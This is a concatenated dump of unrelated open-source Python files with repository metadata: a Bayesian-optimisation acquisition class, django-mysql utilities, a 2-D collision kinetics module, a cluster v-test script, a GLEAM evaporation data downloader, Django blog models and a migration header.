:param threshold: Observed values lower than the threshold are considered valid
:param minimum_pof: minimum pof score required for a point to be valid.
For more information, see docstring of feasible_data_index
"""
super(ProbabilityOfFeasibility, self).__init__(model)
self.threshold = threshold
self.minimum_pof = minimum_pof
def constraint_indices(self):
return np.arange(self.data[1].shape[1])
def feasible_data_index(self):
"""
Returns a boolean array indicating which points are feasible (True) and which are not (False).
Answering the question *which points are feasible?* is slightly troublesome in case noise is present.
Directly relying on the noisy data and comparing it to self.threshold does not make much sense.
Instead, we rely on the model belief using the PoF (a probability between 0 and 1).
As the implementation of the PoF corresponds to the cdf of the (normal) predictive distribution in
a point evaluated at the threshold, requiring a minimum pof of 0.5 implies the mean of the predictive
distribution is below the threshold, hence it is marked as feasible. A minimum pof of 0 marks all points valid.
Setting it to 1 results in all invalid.
:return: boolean ndarray (size N)
"""
pred = self.evaluate(self.data[0])
return pred.ravel() > self.minimum_pof
def build_acquisition(self, Xcand):
candidate_mean, candidate_var = self.models[0].build_predict(Xcand)
candidate_var = tf.maximum(candidate_var, stability)
normal = tf.contrib.distributions.Normal(candidate_mean, tf.sqrt(candidate_var))
return normal.cdf(tf.constant(self.threshold, dtype=float_type), name=self.__class__.__name__)
| apache-2.0 | -1,453,852,975,451,257,900 | 41.282353 | 145 | 0.687257 | false |
adamchainz/django-mysql | src/django_mysql/utils.py | 1 | 9970 | import os
import subprocess
import time
from collections import defaultdict
from queue import Empty, Queue
from threading import Lock, Thread
from weakref import WeakKeyDictionary
import django
from django.db import DEFAULT_DB_ALIAS
from django.db import connection as default_connection
from django.db import connections
class WeightedAverageRate:
"""
Adapted from percona-toolkit - provides a weighted average counter to keep
at a certain rate of activity (row iterations etc.).
"""
def __init__(self, target_t, weight=0.75):
"""
target_t - Target time for t in update()
weight - Weight of previous n/t values
"""
self.target_t = target_t
self.avg_n = 0.0
self.avg_t = 0.0
self.weight = weight
def update(self, n, t):
"""
Update weighted average rate. Param n is generic; it's how many of
whatever the caller is doing (rows, checksums, etc.). Param s is how
long this n took, in seconds (hi-res or not).
Parameters:
n - Number of operations (rows, etc.)
t - Amount of time in seconds that n took
Returns:
n adjusted to meet target_t based on weighted decaying avg rate
"""
if self.avg_n and self.avg_t:
self.avg_n = (self.avg_n * self.weight) + n
self.avg_t = (self.avg_t * self.weight) + t
else:
self.avg_n = n
self.avg_t = t
return int(self.avg_rate * self.target_t)
@property
def avg_rate(self):
try:
return self.avg_n / self.avg_t
except ZeroDivisionError:
# Assume a small amount of time, not 0
return self.avg_n / 0.001
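# Illustrative pacing loop (added note; process() and the numbers are
# hypothetical). Targets roughly 0.5 s of work per iteration:
#   rate = WeightedAverageRate(target_t=0.5)
#   chunk = 1000
#   while more_rows:
#       with StopWatch() as sw:  # StopWatch is defined below
#           more_rows = process(chunk)
#       chunk = max(1, rate.update(chunk, sw.total_time))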
class StopWatch:
"""
Context manager for timing a block
"""
def __enter__(self):
self.start_time = time.time()
return self
def __exit__(self, *args, **kwargs):
self.end_time = time.time()
self.total_time = self.end_time - self.start_time
def format_duration(total_seconds):
hours = total_seconds // 3600
minutes = (total_seconds % 3600) // 60
seconds = total_seconds % 60
out = []
if hours > 0:
out.extend([str(hours), "h"])
if hours or minutes:
out.extend([str(minutes), "m"])
out.extend([str(seconds), "s"])
return "".join(out)
if django.VERSION >= (3, 0):
def connection_is_mariadb(connection):
return connection.vendor == "mysql" and connection.mysql_is_mariadb
else:
_is_mariadb_cache = WeakKeyDictionary()
def connection_is_mariadb(connection):
if connection.vendor != "mysql":
return False
if connection is default_connection:
connection = connections[DEFAULT_DB_ALIAS]
try:
return _is_mariadb_cache[connection]
except KeyError:
with connection.temporary_connection():
server_info = connection.connection.get_server_info()
is_mariadb = "MariaDB" in server_info
_is_mariadb_cache[connection] = is_mariadb
return is_mariadb
def settings_to_cmd_args(settings_dict):
"""
Copied from django 1.8 MySQL backend DatabaseClient - where the runshell
commandline creation has been extracted and made callable like so.
"""
args = ["mysql"]
db = settings_dict["OPTIONS"].get("db", settings_dict["NAME"])
user = settings_dict["OPTIONS"].get("user", settings_dict["USER"])
passwd = settings_dict["OPTIONS"].get("passwd", settings_dict["PASSWORD"])
host = settings_dict["OPTIONS"].get("host", settings_dict["HOST"])
port = settings_dict["OPTIONS"].get("port", settings_dict["PORT"])
cert = settings_dict["OPTIONS"].get("ssl", {}).get("ca")
defaults_file = settings_dict["OPTIONS"].get("read_default_file")
# Seems to be no good way to set sql_mode with CLI.
if defaults_file:
args += ["--defaults-file=%s" % defaults_file]
if user:
args += ["--user=%s" % user]
if passwd:
args += ["--password=%s" % passwd]
if host:
if "/" in host:
args += ["--socket=%s" % host]
else:
args += ["--host=%s" % host]
if port:
args += ["--port=%s" % port]
if cert:
args += ["--ssl-ca=%s" % cert]
if db:
args += [db]
return args
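# Illustrative result (added note; hypothetical settings dict):
#   settings_to_cmd_args({"NAME": "app", "USER": "root", "PASSWORD": "",
#                         "HOST": "db", "PORT": "3306", "OPTIONS": {}})
#   -> ["mysql", "--user=root", "--host=db", "--port=3306", "app"]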
programs_memo = {}
def have_program(program_name):
global programs_memo
if program_name not in programs_memo:
status = subprocess.call(["which", program_name], stdout=subprocess.PIPE)
programs_memo[program_name] = status == 0
return programs_memo[program_name]
def pt_fingerprint(query):
"""
Takes a query (in a string) and returns its 'fingerprint'
"""
if not have_program("pt-fingerprint"): # pragma: no cover
raise OSError("pt-fingerprint doesn't appear to be installed")
thread = PTFingerprintThread.get_thread()
thread.in_queue.put(query)
return thread.out_queue.get()
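# Illustrative behaviour (added note; requires percona-toolkit's
# pt-fingerprint on the PATH):
#   pt_fingerprint("SELECT * FROM users WHERE id = 123")
#   -> "select * from users where id = ?"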
class PTFingerprintThread(Thread):
"""
Class for a singleton background thread to pass queries to pt-fingerprint
and get their fingerprints back. This is done because the process launch
time is relatively expensive and it's useful to be able to fingerprinting
queries quickly.
The get_thread() class method returns the singleton thread - either
instantiating it or returning the existing one.
The thread launches pt-fingerprint with subprocess and then takes queries
from an input queue, passes them the subprocess and returns the fingerprint
to an output queue. If it receives no queries in PROCESS_LIFETIME seconds,
it closes the subprocess and itself - so you don't have processes hanging
around.
"""
the_thread = None
life_lock = Lock()
PROCESS_LIFETIME = 60.0 # seconds
@classmethod
def get_thread(cls):
with cls.life_lock:
if cls.the_thread is None:
in_queue = Queue()
out_queue = Queue()
thread = cls(in_queue, out_queue)
thread.daemon = True
thread.in_queue = in_queue
thread.out_queue = out_queue
thread.start()
cls.the_thread = thread
return cls.the_thread
def __init__(self, in_queue, out_queue, **kwargs):
self.in_queue = in_queue
self.out_queue = out_queue
super().__init__(**kwargs)
def run(self):
# pty is unix/linux only
import pty # noqa
global fingerprint_thread
master, slave = pty.openpty()
proc = subprocess.Popen(
["pt-fingerprint"], stdin=subprocess.PIPE, stdout=slave, close_fds=True
)
stdin = proc.stdin
stdout = os.fdopen(master)
while True:
try:
query = self.in_queue.get(timeout=self.PROCESS_LIFETIME)
except Empty:
self.life_lock.acquire()
# We timed out, but there was something put into the queue
# since
if (
self.__class__.the_thread is self and self.in_queue.qsize()
): # pragma: no cover
self.life_lock.release()
                    continue
# Die
break
stdin.write(query.encode("utf-8"))
if not query.endswith(";"):
stdin.write(b";")
stdin.write(b"\n")
stdin.flush()
fingerprint = stdout.readline()
self.out_queue.put(fingerprint.strip())
stdin.close()
self.__class__.the_thread = None
self.life_lock.release()
def collapse_spaces(string):
bits = string.replace("\n", " ").split(" ")
return " ".join(filter(None, bits))
def index_name(model, *field_names, **kwargs):
"""
Returns the name of the index existing on field_names, or raises KeyError
if no such index exists.
"""
if not len(field_names):
raise ValueError("At least one field name required")
using = kwargs.pop("using", DEFAULT_DB_ALIAS)
if len(kwargs):
raise ValueError("The only supported keyword argument is 'using'")
existing_fields = {field.name: field for field in model._meta.fields}
fields = [existing_fields[name] for name in field_names if name in existing_fields]
if len(fields) != len(field_names):
unfound_names = set(field_names) - {field.name for field in fields}
raise ValueError("Fields do not exist: " + ",".join(unfound_names))
column_names = tuple(field.column for field in fields)
list_sql = get_list_sql(column_names)
with connections[using].cursor() as cursor:
cursor.execute(
"""SELECT `INDEX_NAME`, `SEQ_IN_INDEX`, `COLUMN_NAME`
FROM INFORMATION_SCHEMA.STATISTICS
WHERE TABLE_SCHEMA = DATABASE() AND
TABLE_NAME = %s AND
COLUMN_NAME IN {list_sql}
ORDER BY `INDEX_NAME`, `SEQ_IN_INDEX` ASC
""".format(
list_sql=list_sql
),
(model._meta.db_table,) + column_names,
)
indexes = defaultdict(list)
for index_name, _, column_name in cursor.fetchall():
indexes[index_name].append(column_name)
indexes_by_columns = {tuple(v): k for k, v in indexes.items()}
try:
return indexes_by_columns[column_names]
except KeyError:
raise KeyError("There is no index on (" + ",".join(field_names) + ")")
def get_list_sql(sequence):
return "({})".format(",".join("%s" for x in sequence))
def mysql_connections():
conn_names = [DEFAULT_DB_ALIAS] + list(set(connections) - {DEFAULT_DB_ALIAS})
for alias in conn_names:
connection = connections[alias]
if connection.vendor == "mysql":
yield alias, connection
| bsd-3-clause | -5,315,907,786,015,990,000 | 30.550633 | 87 | 0.590672 | false |
th0mmeke/toyworld | kinetics_2D.py | 1 | 7872 | """
Created on 22/03/2013
@author: thom
"""
import random
import math
import logging
from rdkit.Chem import AllChem as Chem
from ULPS import Float_t
import config
class Kinetics2D(object):
@classmethod
def get_ke(cls, m, x, y):
return 0.5 * m * (x * x + y * y)
@classmethod
def get_speed(cls, x, y):
return math.sqrt(x * x + y * y)
@classmethod
def radial_to_xyz(cls, theta=None, r=None):
"""Always returns a 2-D x,y"""
if theta is None:
theta = random.uniform(0, 2.0 * math.pi)
if r is None:
r = random.uniform(0, 1)
y = math.sin(theta) * r
x = math.cos(theta) * r
return x, y
@classmethod
def xyz_to_radial(cls, x, y):
"""Always returns a 2-D theta,r"""
r = math.hypot(x, y)
theta = math.atan2(y, x)
return theta, r
@classmethod
def get_distance(cls, l1, l2):
return math.sqrt(sum([(_l1 - _l2) * (_l1 - _l2) for _l1, _l2 in zip(l1, l2)]))
@classmethod
def get_CM_energy(cls, mols):
"""Return KE of Centre of Mass: _ke = 1/2mv^2, where mv for the centre of mass = sum (mi * vi) for all particles i
:param mols: list of Molecule"""
total_mass = sum([mol.get_mass() for mol in mols])
return cls.get_ke(total_mass, *cls.get_CM_velocity(mols))
@classmethod
def get_CM_velocity(cls, mols):
"""Return the momentum (mdx,mdy) of the centre of mass for these particles"""
cm_momentum = [0, 0]
total_mass = sum([mol.get_mass() for mol in mols])
for mol in mols:
cm_momentum += mol.get_velocity() * mol.get_mass()
CM_velocity = cm_momentum / total_mass
logging.debug("CM velocity = {}".format(CM_velocity))
return CM_velocity
# for mol in mols:
# cm_momentum[0] += mol.get_mass() * mol.get_velocity()[0]
# cm_momentum[1] += mol.get_mass() * mol.get_velocity()[1]
# return [mv / total_mass for mv in cm_momentum]
@classmethod
def inelastic_collision(cls, reactant_mols, product_mols, energy_delta):
"""Determine velocities of product molecules following a collision of reactant molecules, for between one and three product molecules.
Model as a collision, followed by an explosion, meaning that the total momentum of the system is conserved - if two particles, each has equal and opposite momentum in CoM frame
Assume an impulse, or force, splitting the particles apart, acting equally on each particle
Then impulse J = mv2-mv1 and so momentum change will be the same for all particles
Implies that for two particles, equal and opposite mv in CoM frame, and for three particles, mv arranged in equilateral triangle
Post-conditions:
        1. Sum in_mass = Sum out_mass - although #in_molecules may differ from #out_molecules
2. Vector speed and direction of CoM remains constant
3. in_KE + in_PE + in_IE = Sum out_KE + out_PE + out_IE or in_KE - delta_KE = out_KE
:param reactant_mols: reactants - must have total KE > 0
:type reactant_mols: list of Molecule
:param product_mols: products of reaction - must be 1, 2 or 3 products only
:type product_mols: list of Molecule
:param energy_delta: final KE = initial KE - energy_delta
"""
def total_mv(mv):
totals = [0, 0]
for mv_ in mv:
for dim in range(len(totals)):
totals[dim] += mv_[dim]
return totals
if len(product_mols) < 1 or len(product_mols) > 3:
            raise ValueError("expected one to three product molecules, got {}".format(len(product_mols)))
logging.debug("reactant_mols = {}, product_mols = {}".format([Chem.MolToSmiles(mol) for mol in reactant_mols], [Chem.MolToSmiles(mol) for mol in product_mols]))
in_v = [mol.get_velocity() for mol in reactant_mols]
in_mass = [mol.get_mass() for mol in reactant_mols]
in_mv = [[m * v_ for v_ in v] for m, v in zip(in_mass, in_v)]
in_ke = sum([mol.get_kinetic_energy() for mol in reactant_mols])
in_ie = sum([mol.get_internal_energy() for mol in reactant_mols])
# Velocity of centre of mass after collision
# Momentums add to zero in the CoM frame
out_mass = [mol.get_mass() for mol in product_mols]
cm_in_v = cls.get_CM_velocity(reactant_mols)
cm_in_radial_v = cls.xyz_to_radial(*cm_in_v)
# Bound energy_of_collision to above zero (rounding errors for small values)
# consistent sense with that in discover_reaction - final_PE = initial_PE + energy_delta => final_KE = initial_KE - energy_delta
energy_of_collision = max(0, in_ke + in_ie - energy_delta - cls.get_CM_energy(reactant_mols))
if energy_of_collision <= 0:
            raise ValueError("no kinetic energy available to distribute over the products")
out_v_in_CoM_frame = []
if len(out_mass) == 1:
# One out particle is stationary in out_CoM frame
IE = energy_of_collision # inelastic collision -> loss of KE -> must go to IE
out_v_in_CoM_frame.append([0, 0])
elif len(out_mass) == 2:
ke_in_CM_frame = random.uniform(0, energy_of_collision)
IE = energy_of_collision - ke_in_CM_frame
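            # Each product carries momentum of magnitude p in the CoM frame:
            # KE = p**2/(2*m1) + p**2/(2*m2)  =>  p = sqrt(2*KE*m1*m2/(m1+m2))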
mv = math.sqrt((2.0 * ke_in_CM_frame * out_mass[0] * out_mass[1]) / (out_mass[0] + out_mass[1]))
out_v_in_CoM_frame.append(cls.radial_to_xyz(cm_in_radial_v[0] + math.pi * 0.5, mv))
out_v_in_CoM_frame.append(cls.radial_to_xyz(cm_in_radial_v[0] + math.pi * 1.5, mv))
elif len(out_mass) == 3:
# Sum of vector momentums = 0, and in centre of momentum frame arranged as equilateral triangle, side mv
# Must then convert to velocities by dividing by particle mass, which means no longer equilateral...but unimportant, as only needed equilateral to initially arrange
ke_in_CM_frame = random.uniform(0, energy_of_collision) # The energy of the collision - over and above the energy of the centre of mass, which is invariant
IE = energy_of_collision - ke_in_CM_frame
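            # Equal momentum magnitudes p arranged at 120 degrees sum to zero, and
            # KE = (p**2/2)*(1/m1 + 1/m2 + 1/m3)
            #   => p = sqrt(2*KE*m1*m2*m3 / (m1*m2 + m2*m3 + m1*m3))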
mv = math.sqrt((2.0 * ke_in_CM_frame * out_mass[0] * out_mass[1] * out_mass[2]) / (out_mass[0] * out_mass[1] + out_mass[1] * out_mass[2] + out_mass[0] * out_mass[2]))
out_v_in_CoM_frame.append(cls.radial_to_xyz(cm_in_radial_v[0] + math.pi / 3.0, mv))
out_v_in_CoM_frame.append(cls.radial_to_xyz(cm_in_radial_v[0] - math.pi / 3.0, mv))
out_v_in_CoM_frame.append(cls.radial_to_xyz(cm_in_radial_v[0] + math.pi, mv))
# Now convert from momentums to velocities by scaling by 1/mass
out_v_in_CoM_frame = [[mv_component / mass for mv_component in particle_mv] for particle_mv, mass in zip(out_v_in_CoM_frame, out_mass)]
# Finally convert back from CoM frame to lab frame
out_v = [[v_ + cm_v_ for v_, cm_v_ in zip(v, cm_in_v)] for v in out_v_in_CoM_frame]
#########################
# Confirm post-conditions
# 1. Mass
assert Float_t.almost_equal(sum(in_mass), sum(out_mass))
# 2. Momentum
out_mv = [[m * v_ for v_ in v] for m, v in zip(out_mass, out_v)]
in_mv_total = total_mv(in_mv)
out_mv_total = total_mv(out_mv)
logging.debug("IN MV = {}, OUT MV = {}".format(in_mv_total, out_mv_total))
for in_, out_ in zip(in_mv_total, out_mv_total):
assert Float_t.almost_equal(in_, out_)
# 3. Energy
out_ke = sum([cls.get_ke(m, *v) for m, v in zip(out_mass, out_v)])
logging.debug("IN_KE + IN_IE = {}+{} = {}, OUT_KE + DELTA + IE = {} + {} + {} = {}".format(in_ke, in_ie, in_ke + in_ie, out_ke, energy_delta, IE, out_ke + energy_delta + IE))
assert Float_t.almost_equal(in_ke + in_ie, out_ke + energy_delta + IE, max_diff=config.EnergyTolerance)
return out_v, IE
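
# Example usage (sketch; Molecule is assumed to expose get_mass(), get_velocity(),
# get_kinetic_energy() and get_internal_energy()):
#
#     out_velocities, internal_energy = Kinetics2D.inelastic_collision(
#         [mol_a, mol_b], [product_mol], energy_delta=0.0)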
| gpl-3.0 | 6,768,914,614,100,645,000 | 43.982857 | 184 | 0.597053 | false |
Diviyan-Kalainathan/causal-humans | ClusterAnalysis/v_test.py | 1 | 2510 | '''
Analyses the clusters and returns the v-test value of each variable
Author : Diviyan Kalainathan
Date : 28/06/2016
DEPRECATED - Use plot-gen/Cluster_extraction instead
'''
import csv,numpy
def v_test(input_data,data_folder,num_clusters, num_vars, list_vars):
"""
:param input_data: Data used to do the clustering(String)
:param data_folder: Folder where the clustering output is(String)
:param num_clusters: Number of clusters(int)
    :param num_vars: Number of variables to analyse(int)
    :param list_vars: List of these vars(list[String])
:return: 0
"""
    totaldata = numpy.zeros((num_vars, 2))  # column 0 for mean, column 1 for standard deviation
for n in range(num_vars):
col_data=[]
with open('input/' + input_data, 'rb') as totalfile:
datareader = csv.reader(totalfile, delimiter=';', quotechar='|')
header = next(datareader)
for row in datareader:
                col_data += [float(row[n])]
totaldata[n,0]=numpy.mean(col_data)
totaldata[n,1]=numpy.std(col_data)
cluster_size=numpy.zeros((num_clusters))
    for i in range(num_clusters):
        with open('output/' + data_folder + '/cluster_' + str(i) + '.csv') as clusterfile:
            cluster_size[i] = len(clusterfile.readlines()) - 2
total_size=numpy.sum(cluster_size)
for num_file in range(num_clusters):
with open('output/' + data_folder + '/cluster_similarity_' + str(int(num_file)) + '.csv', 'wb') as outputfile:
datawriter = csv.writer(outputfile, delimiter=';', quotechar='|')
datawriter.writerow(['Var name','V-type'])
for n_var in range(num_vars):
with open('output/'+ data_folder +'/cluster_'+str(num_file)+'.csv', 'rb') as datafile:
datareader = csv.reader(datafile, delimiter=';', quotechar='|')
header = next(datareader)
name_value=[]
for row in datareader:
                    name_value += [float(row[n_var])]
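                # v-test: (cluster_mean - global_mean) /
                #         sqrt(((N - n) / (N - 1)) * sigma**2 / n)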
result=[list_vars[n_var],((numpy.mean(name_value)-totaldata[n_var,0])/ numpy.sqrt(((total_size-cluster_size[num_file])/(total_size-1))*((totaldata[n_var,1]**2)/cluster_size[num_file])))]
                # compute the v-test value for this variable in this cluster
with open('output/' + data_folder + '/cluster_similarity_' + str(int(num_file)) + '.csv', 'a') as outputfile:
datawriter = csv.writer(outputfile, delimiter=';', quotechar='|',
lineterminator='\n')
datawriter.writerow(result)
return 0 | mit | 1,592,596,920,828,584,400 | 42.293103 | 202 | 0.584064 | false |
wateraccounting/wa | Collect/GLEAM/DataAccess.py | 1 | 8456 | # -*- coding: utf-8 -*-
"""
Authors: Tim Hessels
UNESCO-IHE 2016
Contact: [email protected]
Repository: https://github.com/wateraccounting/wa
Module: Collect/GLEAM
"""
# import general python modules
import os
import numpy as np
import pandas as pd
import glob
from joblib import Parallel, delayed
import paramiko
import calendar
from netCDF4 import Dataset
# Water Accounting modules
import wa.General.data_conversions as DC
from wa import WebAccounts
def DownloadData(Dir, Startdate, Enddate, latlim, lonlim, Waitbar, cores, TimeCase):
"""
This function downloads GLEAM ET data
Keyword arguments:
Dir -- 'C:/file/to/path/'
Startdate -- 'yyyy-mm-dd'
Enddate -- 'yyyy-mm-dd'
latlim -- [ymin, ymax] (values must be between -50 and 50)
lonlim -- [xmin, xmax] (values must be between -180 and 180)
cores -- The number of cores used to run the routine. It can be 'False'
to avoid using parallel computing routines.
Waitbar -- 1 (Default) will print a waitbar
"""
# Check start and end date and otherwise set the date
    if not Startdate:
        Startdate = '2003-01-01'  # keep as a 'yyyy-mm-dd' string; it is sliced below
    if not Enddate:
        Enddate = '2015-12-31'  # keep as a 'yyyy-mm-dd' string; it is sliced below
# Make an array of the days of which the ET is taken
YearsDownloadstart = str(Startdate[0:4])
YearsDownloadend = str(Enddate[0:4])
Years = range(int(YearsDownloadstart),int(YearsDownloadend)+1)
# String Parameters
if TimeCase == 'daily':
VarCode = 'ET_GLEAM.V3.1b_mm-day-1_daily'
FTPprefix = 'data/v3.1b/'
TimeFreq = 'D'
Folder_name = 'Daily'
elif TimeCase == 'monthly':
VarCode = 'ET_GLEAM.V3.1b_mm-month-1_monthly'
FTPprefix = 'data/v3.1b/'
TimeFreq = 'M'
Folder_name = 'Monthly'
# Get end of month for Enddate
monthDownloadend = str(Enddate[5:7])
End_month = calendar.monthrange(int(YearsDownloadend),int(monthDownloadend))[1]
Enddate = '%d-%02d-%d' %(int(YearsDownloadend),int(monthDownloadend),int(End_month))
else:
raise KeyError("The input time interval is not supported")
Dates = pd.date_range(Startdate, Enddate, freq = TimeFreq)
    # Make directory for the GLEAM ET data
output_folder=os.path.join(Dir,'Evaporation', 'GLEAM', Folder_name)
if not os.path.exists(output_folder):
os.makedirs(output_folder)
# Check variables
    if latlim[0] < -50 or latlim[1] > 50:
        print ('Latitude above 50N or below 50S is not possible.'
               ' Values are clipped to [-50, 50]')
        latlim[0] = max(latlim[0], -50)
        latlim[1] = min(latlim[1], 50)
    if lonlim[0] < -180 or lonlim[1] > 180:
        print ('Longitude must be between 180E and 180W.'
               ' Values are clipped to [-180, 180]')
        lonlim[0] = max(lonlim[0], -180)
        lonlim[1] = min(lonlim[1], 180)
    # Download the yearly GLEAM netCDF files from the SFTP server
try:
Collect_data(FTPprefix, Years, output_folder, Waitbar)
except:
print "Was not able to download the file"
# Create Waitbar
print '\nProcess the GLEAM data'
if Waitbar == 1:
import wa.Functions.Start.WaitbarConsole as WaitbarConsole
total_amount = len(Dates)
amount = 0
WaitbarConsole.printWaitBar(amount, total_amount, prefix = 'Progress:', suffix = 'Complete', length = 50)
# Pass variables to parallel function and run
args = [output_folder, latlim, lonlim, VarCode, TimeCase]
if not cores:
for Date in Dates:
RetrieveData(Date, args)
if Waitbar == 1:
amount += 1
WaitbarConsole.printWaitBar(amount, total_amount, prefix = 'Progress:', suffix = 'Complete', length = 50)
results = True
else:
results = Parallel(n_jobs=cores)(delayed(RetrieveData)(Date, args)
for Date in Dates)
    # Remove the downloaded .nc files
os.chdir(output_folder)
files = glob.glob("*.nc")
for f in files:
os.remove(os.path.join(output_folder, f))
return(results)
def RetrieveData(Date, args):
"""
This function retrieves GLEAM ET data for a given date from the
www.gleam.eu server.
Keyword arguments:
Date -- 'yyyy-mm-dd'
args -- A list of parameters defined in the DownloadData function.
"""
# Argument
[output_folder, latlim, lonlim, VarCode, TimeCase] = args
# Adjust latlim to GLEAM dataset
latlim1=[latlim[1]*-1, latlim[0]*-1]
# select the spatial dataset
Ystart=int(np.floor((latlim1[0]+90)/0.25))
Yend=int(np.ceil((latlim1[1]+90)/0.25))
Xstart=int(np.floor((lonlim[0]+180)/0.25))
Xend=int(np.ceil((lonlim[1]+180)/0.25))
Year=Date.year
Month=Date.month
filename='E_' + str(Year) + '_GLEAM_v3.1b.nc'
local_filename = os.path.join(output_folder, filename)
f = Dataset(local_filename,mode='r')
if TimeCase == 'monthly':
# defines the start and end of the month
Datesend1=str(Date)
        Datesend3 = Datesend1[0:8] + '01'  # first day of the month (str.replace on the day substring could also clobber matching year digits)
Datesend4=Datesend1[0:10]
Datestart = pd.date_range(Datesend3,Datesend4,freq = 'MS')
        # determine DOY-1 and DOYend (these are used to define the temporal boundaries within the yearly data)
DOY=int(Datestart[0].strftime('%j'))
DOYend=int(Date.strftime('%j'))
DOYDownload=DOY-1
Day = 1
Data = f.variables['E'][DOYDownload:DOYend,Xstart:Xend,Ystart:Yend]
data=np.array(Data)
f.close()
# Sum ET data in time and change the no data value into -999
        dataSum = np.sum(data, axis=0)  # total ET over the month (sum over the time axis)
dataSum[dataSum<-100]=-999.000
dataCor=np.swapaxes(dataSum,0,1)
if TimeCase == 'daily':
Day = Date.day
# Define the DOY, DOY-1 is taken from the yearly dataset
DOY=int(Date.strftime('%j'))
DOYDownload=DOY-1
Data = f.variables['E'][DOYDownload,Xstart:Xend,Ystart:Yend]
data=np.array(Data)
f.close()
data[data<-100]=-999.000
dataCor=np.swapaxes(data,0,1)
# The Georeference of the map
geo_in=[lonlim[0], 0.25, 0.0, latlim[1], 0.0, -0.25]
# Name of the map
dataset_name=VarCode + '_' + str(Year) + '.' + str(Month).zfill(2) + '.' + str(Day).zfill(2) + '.tif'
output_file=os.path.join(output_folder, dataset_name)
# save data as tiff file
DC.Save_as_tiff(name=output_file, data=dataCor, geo=geo_in, projection="WGS84")
return True
def Collect_data(FTPprefix,Years,output_folder, Waitbar):
'''
    This function downloads all the needed yearly GLEAM files from hydras.ugent.be as .nc files.

    Keyword arguments:
FTPprefix -- FTP path to the GLEAM data
Date -- 'yyyy-mm-dd'
output_folder -- 'C:/file/to/path/'
'''
    # SFTP server details; username and password come from WebAccounts
server='hydras.ugent.be'
portnumber=2225
username, password = WebAccounts.Accounts(Type='GLEAM')
# Create Waitbar
print '\nDownload GLEAM data'
if Waitbar == 1:
import wa.Functions.Start.WaitbarConsole as WaitbarConsole
total_amount2 = len(Years)
amount2 = 0
WaitbarConsole.printWaitBar(amount2, total_amount2, prefix = 'Progress:', suffix = 'Complete', length = 50)
for year in Years:
directory = os.path.join(FTPprefix, '%d' %year)
ssh=paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ssh.connect(server, port=portnumber, username=username, password=password)
ftp=ssh.open_sftp()
ftp.chdir(directory)
filename='E_' + str(year) + '_GLEAM_v3.1b.nc'
local_filename = os.path.join(output_folder, filename)
if not os.path.exists(local_filename):
ftp.get(filename, local_filename)
if Waitbar == 1:
amount2 += 1
WaitbarConsole.printWaitBar(amount2, total_amount2, prefix = 'Progress:', suffix = 'Complete', length = 50)
ftp.close()
ssh.close()
return() | apache-2.0 | 4,973,839,900,364,555,000 | 32.828 | 121 | 0.607498 | false |
delacuesta13/Who-am-I | itsme/models.py | 1 | 4585 | from django.db import models
from django.contrib.auth.models import User
class UserProfile(models.Model):
user = models.ForeignKey(User, unique=True)
phone = models.CharField(max_length=100, blank=True)
location = models.CharField(max_length=100, blank=True)
profession = models.CharField(max_length=100, blank=True)
about = models.TextField(blank=True) # quick overview
resume = models.TextField(blank=True) # complete overview
available_for_work = models.BooleanField(default=True)
class Blog(models.Model):
user = models.ForeignKey(User, unique=True)
site_title = models.CharField(max_length=100, blank=True)
tagline = models.CharField(max_length=100, blank=True)
def __unicode__(self):
return self.site_title
class Category(models.Model):
user = models.ForeignKey(User)
name = models.CharField(max_length=100)
slug = models.SlugField(max_length=100, blank=True)
description = models.TextField(blank=True)
type_category_choices = (
('work', 'Work'),
('blog', 'Blog'),
)
type_category = models.CharField(max_length=16, choices=type_category_choices)
def __unicode__(self):
return self.name
class Post(models.Model):
blog = models.ForeignKey(Blog)
categories = models.ManyToManyField(Category, through='CategoryRelationships')
date = models.DateTimeField(auto_now=False, auto_now_add=False)
title = models.TextField(blank=True)
slug = models.SlugField(max_length=100, unique=True, blank=True)
content = models.TextField(blank=True)
status_choices = (
('publish', 'Publish'),
('draft', 'Draft'),
('future', 'Schedule'),
)
status = models.CharField(max_length=16, choices=status_choices, default="publish")
allow_comments = models.BooleanField(default=True)
created_at = models.DateTimeField(auto_now=False, auto_now_add=True)
updated_at = models.DateTimeField(null=True, auto_now=True, auto_now_add=False)
def __unicode__(self):
return self.title
def get_status(self):
status = self.status.lower()
if status == 'draft':
status = status.capitalize()
elif status == 'publish':
status = 'Published'
elif status == 'future':
            status = 'Scheduled'
return status
class Comment(models.Model):
post = models.ForeignKey(Post)
user = models.ForeignKey(User, null=True, blank=True, on_delete=models.SET_NULL)
author = models.CharField(max_length=30)
email = models.EmailField(max_length=100)
url = models.URLField(blank=True)
ip = models.IPAddressField(max_length=100)
date = models.DateTimeField(auto_now=False, auto_now_add=True)
content = models.TextField()
is_moderate = models.BooleanField(default=False)
is_safe = models.BooleanField(default=False) # if True, allow HTML code
class Project(models.Model):
user = models.ForeignKey(User)
categories = models.ManyToManyField(Category, through='CategoryRelationships')
name = models.CharField(max_length=100)
slug = models.SlugField(max_length=100, unique=True, blank=True)
description = models.TextField()
site_url = models.URLField(blank=True)
created_at = models.DateTimeField(auto_now=False, auto_now_add=True)
updated_at = models.DateTimeField(null=True, auto_now=True, auto_now_add=False)
    def __unicode__(self):
return self.name
class CategoryRelationships(models.Model):
category = models.ForeignKey(Category)
post = models.ForeignKey(Post, null=True, blank=True)
project = models.ForeignKey(Project, null=True, blank=True)
class Message(models.Model):
user = models.ForeignKey(User)
date = models.DateTimeField(auto_now=False, auto_now_add=True)
ip = models.IPAddressField(max_length=100, null=True, blank=True)
author = models.CharField(max_length=100, null=True, blank=True)
email = models.EmailField(max_length=100, null=True, blank=True)
subject = models.CharField(max_length=100, null=True, blank=True)
content = models.TextField(null=True, blank=True)
is_readed = models.BooleanField(default=False)
class Upload(models.Model):
user = models.ForeignKey(User)
path = models.TextField(blank=True)
title = models.TextField(blank=True)
upload_date = models.DateTimeField(null=True, auto_now=False, auto_now_add=True)
extension_file = models.CharField(max_length=100, blank=True)
description = models.TextField(blank=True)
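
# Example usage (sketch; assumes a configured Django project and that
# `datetime` has been imported):
#
#     user = User.objects.create_user('alice', '[email protected]', 'secret')
#     blog = Blog.objects.create(user=user, site_title='My Site')
#     post = Post.objects.create(blog=blog, title='Hello world',
#                                date=datetime.datetime.now(), status='publish')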
| gpl-3.0 | -7,769,707,275,793,938,000 | 40.306306 | 87 | 0.68506 | false |
steny138/PythonTaipeiOpendata | migrations/versions/3974d310ac43_.py | 1 | 3035 | """Create the routes, stops and users tables.
Revision ID: 3974d310ac43
Revises: edfc37a36914
